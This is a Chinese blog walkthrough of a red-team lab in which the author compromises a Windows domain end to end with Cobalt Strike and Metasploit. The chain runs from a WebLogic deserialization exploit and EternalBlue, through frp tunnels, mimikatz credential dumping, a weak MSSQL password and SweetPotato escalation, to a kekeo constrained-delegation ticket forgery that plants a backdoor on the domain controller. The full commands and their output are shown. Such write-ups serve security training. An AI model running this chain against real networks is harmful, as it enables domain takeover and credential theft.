“ 最近一段时间没有做取证题,在学习内网渗透,也开始打一些靶场来练手,本期文章靶场来自公众号:渗透攻击红队,浅浅记录一下主用CobaltStrike打靶过程,后续会尝试主用Metasploit进行打靶,文章仅供学习参考,大佬勿喷。”
靶场下载地址:https://pan.baidu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ提取码: vbi2
声明:本文章仅对个人学习过程进行记录总结,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
01
—
环境简介
-
攻击机:
-
Windows 10:172.20.4.46
-
Kali Linux:172.20.4.16
-
靶机:
-
Windows Server 2012 R2:172.20.4.30、10.10.20.12
-
Windows 7 x64:10.10.20.7、10.10.10.7
-
Windows Server 2008 R2 x64:10.10.10.18
-
Windows Server 2008 R2 x64:10.10.10.8
02
—
外网打点
Weblogic CVE-2016-0638
直接对目标ip172.20.4.30使用fscan进行扫描
fscan.exe -h 172.20.4.30___ _/ _ ___ ___ _ __ __ _ ___| | __/ /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______ (__| | | (_| | (__| <____/ |___/___|_| __,_|___|_|_fscan version: 1.8.3start infoscan172.20.4.30:7001 open[*] alive ports len is: 1start vulscan已完成 1/1[*] 扫描结束,耗时: 11.0346008s
发现开放了7001端口,7001通常是weblogic的默认端口
尝试一下用浏览器访问
dirsearch目录扫描
python3 dirsearch.py -u "http://172.20.4.30:7001" --random-agent
浏览器访问一下/console/login/LoginForm.jsp
使用WebLogicTool批量检测漏洞
存在CVE_2016_0638
命令执行查看到当前用户权限为管理员权限
查看系统信息可知是一台Windows机器
CS新建监听器
生成powershell command payload
保存为1111.txt
拿到WebLogicTool中命令执行上线CS,拿到一个管理员权限
将回连间隔设置为0方便操作
查看当前网络配置信息
beacon> shell ipconfig /all[*] Tasked beacon to run: ipconfig /all[+] host called home, sent: 44 bytes[+] received output:Windows IP 配置主机名 . . . . . . . . . . . . . : weblogic主 DNS 后缀 . . . . . . . . . . . :节点类型 . . . . . . . . . . . . : 混合IP 路由已启用 . . . . . . . . . . : 否WINS 代理已启用 . . . . . . . . . : 否以太网适配器 Ethernet1:连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Intel(R) 82574L 千兆网络连接 #2物理地址. . . . . . . . . . . . . : 00-0C-29-84-D6-EBDHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是本地链接 IPv6 地址. . . . . . . . : fe80::4116:2a67:3c40:e05c%14(首选)IPv4 地址 . . . . . . . . . . . . : 10.10.20.12(首选)子网掩码 . . . . . . . . . . . . : 255.255.255.0默认网关. . . . . . . . . . . . . : 10.10.20.1DHCPv6 IAID . . . . . . . . . . . : 385879081DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-2D-85-B9-8E-00-0C-29-84-D6-E1DNS 服务器 . . . . . . . . . . . : 10.10.20.12TCPIP 上的 NetBIOS . . . . . . . : 已启用以太网适配器 Ethernet0:连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Intel(R) 82574L 千兆网络连接物理地址. . . . . . . . . . . . . : 00-0C-29-84-D6-E1DHCP 已启用 . . . . . . . . . . . : 是自动配置已启用. . . . . . . . . . : 是本地链接 IPv6 地址. . . . . . . . : fe80::ccb5:101a:b773:f705%12(首选)IPv4 地址 . . . . . . . . . . . . : 172.20.4.30(首选)子网掩码 . . . . . . . . . . . . : 255.255.252.0获得租约的时间 . . . . . . . . . : 2024年3月23日 20:41:23租约过期的时间 . . . . . . . . . : 2024年3月25日 20:55:55默认网关. . . . . . . . . . . . . : 172.20.7.254DHCP 服务器 . . . . . . . . . . . : 172.31.255.4DHCPv6 IAID . . . . . . . . . . . : 301993001DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-2D-85-B9-8E-00-0C-29-84-D6-E1DNS 服务器 . . . . . . . . . . . : 172.31.255.5211.142.211.124TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{E7ECCBFA-0D99-4183-B53D-C83F88C7D49C}:媒体状态 . . . . . . . . . . . . : 媒体已断开连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{8F6412DB-D757-413C-97E1-76F7DB61BD9C}:媒体状态 . . . . . . . . . . . . : 媒体已断开连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #3物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是
可以看到当前机器无域环境,存在内网:10.10.20.x网段
03
—
内网渗透
内网信息收集
抓取当前机器密码
beacon> hashdump[*] Tasked beacon to dump hashes[+] host called home, sent: 82541 bytes[+] received password hashes:Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fscan扫描10.10.20.1/24网段
fscan.exe -h 10.10.20.1/24 -o out.txt___ _/ _ ___ ___ _ __ __ _ ___| | __/ /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______ (__| | | (_| | (__| <____/ |___/___|_| __,_|___|_|_fscan version: 1.8.1start infoscan(icmp) Target 10.10.20.7 is alive(icmp) Target 10.10.20.12 is alive[*] Icmp alive hosts len is: 210.10.20.12:445 open10.10.20.7:445 open10.10.20.7:139 open10.10.20.12:7001 open10.10.20.12:139 open10.10.20.12:135 open10.10.20.7:135 open[*] alive ports len is: 7start vulscan[+] NetInfo:[*]10.10.20.12[->]weblogic[->]10.10.20.12[->]172.20.4.30[*] 10.10.20.12 WORKGROUPWEBLOGIC Windows Server 2012 R2 Datacenter 9600[+] NetInfo:[*]10.10.20.7[->]work-7[->]10.10.20.7[->]10.10.10.7[+] 10.10.20.7 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)[*] 10.10.20.7 __MSBROWSE__WORK-7 Windows 7 Ultimate 7601 Service Pack 1[*] WebTitle:http://10.10.20.12:7001 code:404 len:1164 title:Error 404--Not Found[+] InfoScan:http://10.10.20.12:7001 [weblogic][+] http://10.10.20.12:7001/console/j_security_check poc-yaml-weblogic-console-weak [{username weblogic} {password weblogic123} {payload UTF-8}][+] http://10.10.20.12:7001 poc-yaml-weblogic-cve-2020-14750[+] http://10.10.20.12:7001 poc-yaml-weblogic-cve-2019-2725 v12
扫描到内网10.10.20.7是一台存在MS17-010永恒之蓝的win7机器
搭建socks5代理隧道
Kali执行:
frps -c frps.inifrps.ini配置
[common]bind_addr =0.0.0.0bind_port = 7000
上传frpc.exe和frpc.ini到已上线的机器
frpc.ini配置
[common]server_addr = 172.20.4.16server_port = 7000[plugin_socks]type = tcpremote_port = 1080plugin = socks5
使用CS在已上线的机器上执行:
shell C:WindowsTempfrpc.exe -c C:WindowsTempfrpc.ini
代理隧道搭建成功
MS17-010永恒之蓝
使用MSF通过socks5隧道对内网的10.10.20.7进行永恒之蓝漏洞利用
# 设置全局代理msf6 > setg Proxies socks5:172.20.4.16:1080# 设置允许通过代理反弹shellmsf6 > setg ReverseAllowProxy true# MS17-010漏洞利用msf6 > use exploit/windows/smb/ms17_010_eternalbluemsf6 exploit(windows/smb/ms17_010_eternalblue) > show optionsmsf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.20.7# 使用反向后门没得到会话,可能目标机器不出网,改用正向msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > run
拿到10.10.20.7的SYSTEM权限
进入交互式shell,更换编码,测试出网情况
win7中转上线CS
由于win7机器不出网,无法直接连接到CS,使用weblogic机器做中转上线:
CS中右键已上线的会话->代理转发->转发上线
生成一个可执行程序
通过MSF将zhuanfa1.exe上传到目标机器
执行zhuanfa1.exe
此时目标并未上线CS,尝试ping一下weblogic机器
发现ping不通,用weblogic机器ping一下win7
可以ping通,查看weblogic机器的防火墙状态
shell netsh firewall show config
防火墙是启用的状态,关闭防火墙
shell netsh advfirewall set allprofiles state off
此时再查看防火墙配置就是禁用的状态了
再尝试用win7机器ping一下weblogic机器
通了,执行zhuanfa1.exe
成功上线,system权限
查看当前网络环境
[*] Tasked beacon to run: ipconfig /all[+] host called home, sent: 44 bytes[+] received output:Windows IP 配置主机名 . . . . . . . . . . . . . : work-7主 DNS 后缀 . . . . . . . . . . . : redteam.red节点类型 . . . . . . . . . . . . : 混合IP 路由已启用 . . . . . . . . . . : 否WINS 代理已启用 . . . . . . . . . : 否DNS 后缀搜索列表 . . . . . . . . : redteam.red以太网适配器 本地连接 2:连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2物理地址. . . . . . . . . . . . . : 00-0C-29-91-D2-55DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是本地链接 IPv6 地址. . . . . . . . : fe80::7421:fef:3e08:acb8%16(首选)IPv4 地址 . . . . . . . . . . . . : 10.10.20.7(首选)子网掩码 . . . . . . . . . . . . : 255.255.255.0默认网关. . . . . . . . . . . . . : 10.10.20.1DHCPv6 IAID . . . . . . . . . . . : 352324649DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9DNS 服务器 . . . . . . . . . . . : 10.10.20.12TCPIP 上的 NetBIOS . . . . . . . : 已启用以太网适配器 本地连接:连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection物理地址. . . . . . . . . . . . . : 00-0C-29-91-D2-4BDHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是本地链接 IPv6 地址. . . . . . . . : fe80::60d4:f2c1:70a7:195f%11(首选)IPv4 地址 . . . . . . . . . . . . : 10.10.10.7(首选)子网掩码 . . . . . . . . . . . . : 255.255.255.0默认网关. . . . . . . . . . . . . : 10.10.10.1DHCPv6 IAID . . . . . . . . . . . : 234884137DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9DNS 服务器 . . . . . . . . . . . : 10.10.10.8TCPIP 上的 NetBIOS . . . . . . . : 已启用隧道适配器 isatap.{6A2D8ACA-7DC5-49AC-8DF3-95C9F384D974}:媒体状态 . . . . . . . . . . . . : 媒体已断开连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是隧道适配器 isatap.{28CA7395-A741-4E5A-BC50-6AAB69E7B927}:媒体状态 . . . . . . . . . . . . : 媒体已断开连接特定的 DNS 后缀 . . . . . . . :描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0DHCP 已启用 . . . . . . . . . . . : 否自动配置已启用. . . . . . . . . . : 是
发现当前机器在redteam.red域中,还存在一个10.10.10.x网段
查看域内有哪些用户
beacon> shell net user /domain[*] Tasked beacon to run: net user /domain[+] host called home, sent: 47 bytes[+] received output:这项请求将在域 redteam.red 的域控制器处理。\owa.redteam.red 的用户帐户-------------------------------------------------------------------------------adduser Administrator apt404gu Guest krbtgtmail saul saulgoodmanSM_4c09f7e38ef84c22b SM_645db7f160894c7fb SM_958e768f5a2e4c9fbSM_dfb6b69905864ca19 sqlserver命令运行完毕,但发生一个或多个错误。
使用mimikatz抓取密码
抓到域用户saul的明文密码:admin!@#45
因为当前是system权限,可以查看一下进程列表
很遗憾没有域管理员进程,无法通过令牌窃取直接拿到域管权限
上传nbtscan探测内网
还有10.10.10.8和10.10.10.18两台机器
定位域控
可以看到域控为owa,10.10.10.8这台机器
上传AdFind尝试查找约束委派的用户
beacon> shell C:WindowsTempAdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto[*] Tasked beacon to run: C:WindowsTempAdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto[+] host called home, sent: 226 bytes[+] received output:AdFind V01.52.00cpp Joe Richards ([email protected]) January 2020Using server: owa.redteam.red:389Directory: Windows Server 2008 R2dn:CN=sqlserver,CN=Users,DC=redteam,DC=red>cn: sqlserver>distinguishedName: CN=sqlserver,CN=Users,DC=redteam,DC=red>msDS-AllowedToDelegateTo: cifs/owa.redteam.red/redteam.red>msDS-AllowedToDelegateTo: cifs/owa.redteam.red>msDS-AllowedToDelegateTo: cifs/OWA>msDS-AllowedToDelegateTo: cifs/owa.redteam.red/REDTEAM>msDS-AllowedToDelegateTo: cifs/OWA/REDTEAM1 Objects returned
可以看到sqlserver这个用户被配置了域控owa的CIFS服务的约束委派
使用fscan扫描一下10.10.10.1/24
扫到了10.10.10.18:1433端口的mssql服务弱口令sa:sa
sqlserver中转上线CS
使用CS自带的socks5代理,在win7机器上搭建隧道
proxifier添加代理服务:172.20.4.16:1081
配置代理规则
使用MDUT连接
查看当前用户权限
尝试ping一下win7机器
CS中设置一个win7机器的中转监听器
生成可执行程序后门zhuanfa2.exe,使用MDUT上传到目标机器
很多目录没有权限,在C:/Users/Public/上传成功
命令执行运行C:UsersPubliczhuanfa2.exe成功上线
当前用户权限较低
直接getsystem行不通
使用sweetpotato测试可以提权
使用sweetpotato运行C:UsersPubliczhuanfa2.exe上线一个system权限的会话
mimikatz抓取到域用户sqlserver的密码:Server12345
约束委派攻击接管域控
前面通过AdFind查询得到sqlserver用户被配置了域控owa的CIFS服务的约束委派,所以可以通过约束委派攻击来获取域控权限
上传kekeo.exe到目标机器,请求sqlserver用户的TGT
shell C:WindowsTempkekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi" "exit"
生成的TGT在C:Windowssystem32下,名为:
TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi(因为是在C:Windowssystem32cmd.exe中执行的命令)
上传mimikatz到目标机器,清空机器内存中的票据:
shell C:WindowsTempmimikatz.exe "kerberos::purge" "exit"shell C:WindowsTempmimikatz.exe "kerberos::list" "exit"
使用kekeo伪造S4U请求以administrator用户身份请求域控owa的CIFS服务的ST
shell C:WindowsTempkekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red" "exit"
得到ST:
TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi使用mimikatz将ST导入当前会话:
shell C:WindowsTempmimikatz.exe "kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi" "exit"
查看当前的票据
shell klist
访问一下域控C盘
shell dir \owac$
在目标管理员用户桌面拿到flag:flag{saulgoodman}
定时任务上线域控到CS
拿到访问域控cifs服务的票据后,将zhuanfa2.exe复制到域控的C盘
shell copy C:UsersPubliczhuanfa2.exe \owac$
检查是否复制成功
shell dir \owac$
遇到拒绝访问再重新导入ST即可
shell C:WindowsTempmimikatz.exe "kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi" "exit"shell dir \owac$
查看域控时间
shell net time /domain
at定时任务执行zhuanfa2.exe让域控上线CS(拒绝访问的话就重新导入ST再设置定时任务)
shell at \owa 16:34 C:zhuanfa2.exe
至此拿下整个靶场环境
04
—
靶场总结
Weblogic CVE-2016-0638反序列化漏洞拿到dmz区跳板机权限,内网一台Win7存在MS17-010,CS并没有可以直接利用的EXP,使用frp搭建socks5隧道访问内网,用MSF中的EXP打17-010拿下Win7再上线到CS,因为Win7机器不出网,无法连接到CS的服务器,所以要在跳板机做中转上线,信息收集得到约束委派信息,fscan内网扫描发现mssql弱口令,在Win7上做socks5代理,使用MDUT对mssql进行利用,通过Win7中转上线到CS,SweetPotato提权得到SYSTEM权限,高权限抓取到约束委派用户明文密码,利用约束委派攻击伪造票据拿到域控CIFS服务访问权限,上传后门到域控并通过定时任务运行后门来上线域控到CS
点点关注不迷路
喜欢的看官还请多多点赞转发
原文始发于微信公众号(XiAnG学安全):内网靶场 | 渗透攻击红队内网域渗透靶场-1(CobaltStrike)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论